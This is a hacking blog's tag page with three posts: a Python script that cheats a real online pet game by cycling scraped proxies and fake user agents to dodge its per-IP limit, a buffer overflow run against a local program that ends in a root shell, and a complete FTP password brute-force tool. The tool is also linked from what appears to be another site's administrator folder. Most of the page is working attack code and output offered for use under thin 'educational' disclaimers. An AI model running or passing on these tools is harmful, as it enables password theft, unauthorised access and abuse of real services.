break a time, with break the c0de…

Posts tagged “c0de

Digimon online pets cheat with python


it’s about yesterday, when i see my nephew playing some games in internet
then he send a link to his friend in chat,
well i see he’s playing digimon online pets .
http://www.blutdygiadopt.myadopts.com/
who need feed by click the url address of the digi and the digi will be level up by clicking count
as a good uncle, so i try to make some cheat for his game ;)
so i’ve interested to register in that game .
after analyze, the game has been discovered a weakness
the weakness is the game just check by ip address.. not connections header, via, time, bogus address, etc
so the goal, to make ip address different every visit the link using proxy
that’s so easy because i’ve made pyproxy python library for continue develope the cheat
go to here for download pyproxy : https://sourceforge.net/projects/pyproxy/ ;)
download pyproxy library and place it in same directory with the code bellow

Get cash from your website. Sign up as affiliate.

here it is the code,

#!/usr/bin/python
# This code is just for educational only or messing around ;)
# By gunslinger_ <yudha.gunslinger@gmail.com>
# http://bit.ly/codebreaker

import mechanize, urllib2, urllib, sys, time, random, cookielib, re, httplib, socket, threading, os
try:
	import pyproxy
except ImportError:
	print "[*] You need to download pyproxy library . check here https://sourceforge.net/projects/pyproxy/"

class UpLevelDigi(threading.Thread):
	def __init__(self):
	        threading.Thread.__init__(self)
		self.timeout 		= 10
		self.verbose		= False
		self.proxylisttext	= "proxylist.txt"
		self.ouruseragent 	= ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
					'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
					'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
					'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
				        'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
				        'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
				        'Microsoft Internet Explorer/4.0b1 (Windows 95)',
				        'Opera/8.00 (Windows NT 5.1; U; en)',
					'amaya/9.51 libwww/5.4.0',
					'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
					'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
					'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
					'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
					'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
					'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
		self.referer		= ['http://google.com','http://bing.com']
		self.mydigi		= ['http://www.blutdygiadopt.myadopts.com/levelup.php?id=20100',
					'http://www.blutdygiadopt.myadopts.com/levelup.php?id=20111',
					'http://www.blutdygiadopt.myadopts.com/levelup.php?id=20112',
					'http://www.blutdygiadopt.myadopts.com/levelup.php?id=20113',
					'http://www.blutdygiadopt.myadopts.com/levelup.php?id=20114',
					'http://www.blutdygiadopt.myadopts.com/levelup.php?id=20115',
					'http://www.blutdygiadopt.myadopts.com/levelup.php?id=20117',
					'http://www.blutdygiadopt.myadopts.com/levelup.php?id=20118',
					'http://www.blutdygiadopt.myadopts.com/levelup.php?id=20119']

	def ProxyLoader(self):
		global proxylist
		try:
			preventstrokes = open(self.proxylisttext, "r")
			proxylist      = preventstrokes.readlines()
			count          = 0
			while count < len(proxylist):
				proxylist[count] = proxylist[count].strip()
				count += 1
		except(IOError):
		  	print "\n[-] Error: Check your proxylist path\n"
		  	sys.exit(1)

	def LevelUp(self, proxy):
		try:
			socket.setdefaulttimeout(self.timeout)
			proxy 			= proxy.split(":")
			proxy_info 		= {
						'host' : proxy[0],
						'port' : int(proxy[1])
						}
			proxy_support = urllib2.ProxyHandler({"http" : "%s:%d" % (proxy[0], int(proxy[1]))})
			opener = urllib2.build_opener(proxy_support, urllib2.HTTPHandler)
			opener.addheaders = [('User-agent', random.choice(self.ouruseragent)),
						('Referer', random.choice(self.referer))]
			urllib2.install_opener(opener)
			f = urllib2.urlopen(random.choice(self.mydigi))
			if self.verbose:
				print f.headers
				print f.read()
			if "You (or someone using your IP address)" in f.read():
				print "[*] Digi Not Feeded..."
			else:
				print "[*] Feed the Digi Success !"
		except httplib.BadStatusLine:
			pass
		except AttributeError:
			pass
		except socket.error:
			pass
		except urllib2.URLError:
			pass
		except httplib.IncompleteRead:
			pass
		except IndexError:
			pass

	def run(self):
		print "[*] Using PID : %s " % (os.getpid())
		for proxy in proxylist:
			self.LevelUp(proxy.replace("\n",""))

def ProxyGathering():
	proxyurl 	= ['http://www.proxy-list.net/anonymous-proxy-lists.shtml',
			'http://www.digitalcybersoft.com/ProxyList/fresh-proxy-list.shtml',
			'http://www.1proxyfree.com/',
			'http://www.proxylists.net/http_highanon.txt',
			'http://www.atomintersoft.com/products/alive-proxy/socks5-list/',
			'http://www.proxylist.net/',
			'http://aliveproxy.com/high-anonymity-proxy-list/',
			'http://spys.ru/en/',
			'http://spys.ru/en/http-proxy-list/',
			'http://atomintersoft.com/free_proxy_list',
			'http://aliveproxy.com/proxy-list/proxies.aspx/Indonesia-id',
			'http://tinnhanh.ipvnn.com/free-proxy/Indonesia_Proxy_List.ipvnn']
	ph 		= pyproxy.proxyhunter(Verbose=False, TimeOut=20, Sitelist=proxyurl)
	ph.Samairdotru()
	ph.Single()
	ph.Cleanitup()

def main():
	print "DigiCheatEngine "
	print "Programmer	: Gunslinger_"
	print "[*] Searching Proxy for load into DigiCheatEngine first..."
	ProxyGathering()
	print "[*] Running DigiCheatEngine ! You must kill the PID to end this process !"
	DigiCheatEngine		= UpLevelDigi()
	DigiCheatEngine2	= UpLevelDigi()
	DigiCheatEngine3 	= UpLevelDigi()
	DigiCheatEngine4	= UpLevelDigi()
	DigiCheatEngine5	= UpLevelDigi()
	DigiCheatEngine.ProxyLoader()
	DigiCheatEngine2.ProxyLoader()
	DigiCheatEngine3.ProxyLoader()
	DigiCheatEngine4.ProxyLoader()
	DigiCheatEngine5.ProxyLoader()
	DigiCheatEngine.start()
	DigiCheatEngine2.start()
	DigiCheatEngine3.start()
	DigiCheatEngine4.start()
	DigiCheatEngine5.start()

if __name__ == '__main__':
	main()

here it’s the result

live preview http://www.blutdygiadopt.myadopts.com/profile.php?user=gunslinger

ok keep in touch with http://bit.ly/c0debreaker for take some fun and and take some serious ;)

jasa pembuatan website, jasa pembuatan web, jasa web seo, jasa pembuatan toko online, jasa web disain, media website plus

Get cash from your website. Sign up as affiliate.

Advertisements

easy buffer overflow exploitation


This is buffer overflow scenario with ASLR (Address Space Layer Randomization) and using some my tools that’s made so easy…

gunslinger@c0debreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space
2
gunslinger@c0debreaker:~/bof$ ./ron a
The message was: a
Program completed normally!

gunslinger@c0debreaker:~/bof$ ./ron aaa
The message was: aaa
Program completed normally!
gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/ron -s 1 -e 500

Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>

[*] Checking Existing application 					[Ok]
[*] Checking perl 							[Ok]
[*] Preparing for bruteforcing buffer 					[Ok]
[*] buffering on 44 byte(s)
[!] Application got segmentation fault by giving 44 byte(s) into buffer !!

gunslinger@c0debreaker:~/bof$ ./stackbf ron 48
[*] Using return address 0xbfd24880
[*] Environment variable 128 kb
[*] Shellcode size 28 bytes
The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

The message was: ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐ÇHÊ┐
Program completed normally!

# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# uname -a
Linux c0debreaker 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# exit
gunslinger@c0debreaker:~/bof$

ftpbrute.py


ftpbrute.py is An automated script for FTP dictionary attack (bruteforce)

#!/usr/bin/python
################################################################
#       .___             __          _______       .___        #
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    #
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   #
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   #
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   #
#        \/                  \/             \/                 #
#                   ___________   ______  _  __                #
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                #
#                 \  \___|  | \/\  ___/\     /                 #
#                  \___  >__|    \___  >\/\_/                  #
#      est.2007        \/            \/   forum.darkc0de.com   #
################################################################
# This is ftp brute force tools [Updated].
# This was written for educational purpose and pentest only. Use it at your own risk.
# Update : More efficient
#	 : prevent loss added
#	 : Anonymous checker added
# VISIT : http://www.devilzc0de.com
# CODING BY : gunslinger_
# EMAIL : gunslinger.devilzc0de@gmail.com
# TOOL NAME : ftpbrute.py v1.5
# Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member
# Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family
# Greetz : all member of jasakom.com, jatimcrew.com
# Special i made for jasakom member and devilzc0de family
# Please remember... your action will be logged in target system...
# Author will not be responsible for any damage !!
# Use it with your own risk

import sys
import time
import os
from ftplib import FTP

if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
	SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
	SysCls = 'cls'
else:
	SysCls = 'unknown'

log = "ftpbrute.log"

face = 	'''
           .___             .__ .__                  _______       .___
         __| _/ ____ ___  __|__||  |  ________  ____ \   _  \    __| _/ ____     ____ _______   ____ __  _  __
        / __ |_/ __ \\\  \/ /|  ||  |  \___   /_/ ___\/  /_\  \  / __ |_/ __ \  _/ ___\\\_  __ \_/ __ \\\ \/ \/ /
       / /_/ |\  ___/ \   / |  ||  |__ /    / \  \___\  \_/   \/ /_/ |\  ___/  \  \___ |  | \/\  ___/ \     /
       \____ | \___  > \_/  |__||____//_____ \ \___  >\_____  /\____ | \___  >  \___  >|__|    \___  > \/\_/
            \/     \/                       \/     \/       \/      \/     \/       \/             \/
												http://www.devilzc0de.com
												by : gunslinger_
ftpbrute.py version 1.0
Brute forcing ftp target
Programmmer : gunslinger_
gunslinger[at]devilzc0de[dot]com
_____________________________________________________________________________________________________________________________________________
'''

option = '''
Usage: ./ftpbrute.py [options]
Options: -t, --target    <hostname/ip>   |   Target to bruteforcing
         -u, --user      <user>          |   User for bruteforcing
         -w, --wordlist  <filename>      |   Wordlist used for bruteforcing
         -h, --help      <help>          |   print this help

Example: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt

'''

file = open(log, "a")

def MyFace() :
	os.system(SysCls)
	print face
	file.write(face)

def HelpMe() :
	MyFace()
	print option
	file.write(option)
	sys.exit(1)

for arg in sys.argv:
	if arg.lower() == '-t' or arg.lower() == '--target':
            hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
	elif arg.lower() == '-u' or arg.lower() == '--user':
            user = sys.argv[int(sys.argv[1:].index(arg))+2]
	elif arg.lower() == '-w' or arg.lower() == '--wordlist':
            wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
	elif arg.lower() == '-h' or arg.lower() == '--help':
        	HelpMe()
	elif len(sys.argv) <= 1:
		HelpMe()

def checkanony() :
	try:
		print "\n[+] Checking for anonymous login\n"
		ftp = FTP(hostname)
		ftp.login()
		ftp.retrlines('LIST')
		print "\n[!] Anonymous login successfuly !\n"
		ftp.quit()
	except Exception, e:
        	print "\n[-] Anonymous login unsuccessful...\n"
		pass

def BruteForce(word) :
	print "[?]Trying :",word
	file.write("\n[?]Trying :"+word)
     	try:
		ftp = FTP(hostname)
		ftp.login(user, word)
		ftp.retrlines('list')
		ftp.quit()
		print "\n\t[!] Login Success ! "
		print "\t[!] Username : ",user, ""
		print "\t[!] Password : ",word, ""
		print "\t[!] Hostname : ",hostname, ""
		print "\t[!] Log all has been saved to",log,"\n"
		file.write("\n\n\t[!] Login Success ! ")
		file.write("\n\t[!] Username : "+user )
		file.write("\n\t[!] Password : "+word )
		file.write("\n\t[!] Hostname : "+hostname)
		file.write("\n\t[!] Log all has been saved to "+log)
		sys.exit(1)
   	except Exception, e:
        	#print "[-] Failed"
		pass
	except KeyboardInterrupt:
		print "\n[-] Aborting...\n"
		file.write("\n[-] Aborting...\n")
		sys.exit(1)

MyFace()
print "[!] Starting attack at %s" % time.strftime("%X")
print "[!] System Activated for brute forcing..."
print "[!] Please wait until brute forcing finish !\n"
file.write("\n[!] Starting attack at %s" % time.strftime("%X"))
file.write("\n[!] System Activated for brute forcing...")
file.write("\n[!] Please wait until brute forcing finish !\n")
checkanony()

try:
	preventstrokes = open(wordlist, "r")
	words 	       = preventstrokes.readlines()
	count          = 0
	while count < len(words):
		words[count] = words[count].strip()
		count += 1
except(IOError):
  	print "\n[-] Error: Check your wordlist path\n"
	file.write("\n[-] Error: Check your wordlist path\n")
  	sys.exit(1)

print "\n[+] Loaded:",len(words),"words"
print "[+] Server:",hostname
print "[+] User:",user
print "[+] BruteForcing...\n"
for word in words:
	BruteForce(word.replace("\n",""))

file.close()


http://www.skyway.co.id/administrator/components/ftpbrute.py


welcome to gunslinger_ blog


selamat datang di gunslinger_ blog !
disini gw akan berbagi tentang beberapa hal programming, tapi berhubung ane belum pulih bgt,
nanti baru gw menulis beberapa artikel disini… hehehe… doain aja ok…? :)